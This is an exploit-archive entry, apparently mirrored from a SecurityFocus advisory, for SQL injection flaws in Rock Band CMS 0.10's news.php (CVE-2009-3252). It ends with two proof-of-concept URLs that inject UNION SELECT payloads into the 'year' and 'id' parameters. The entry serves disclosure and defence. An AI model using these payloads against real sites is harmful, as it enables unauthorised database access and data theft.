[] NeoSense

Rock Band CMS 0.10 - 'news.php' Multiple SQL Injections (2)

Author: Affix
type: webapps
platform: php
port: 
date_added: 2010-08-12 
date_updated: 2014-08-28 
verified: 1 
codes: CVE-2009-3252;OSVDB-57588 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/42424/info

Rock Band CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

http://www.example.com/news.php?year=-2004+UNION+SELECT+1,2,3,4--
http://www.example.com/news.php?id=-1+UNION+SELECT+1,2,3,4--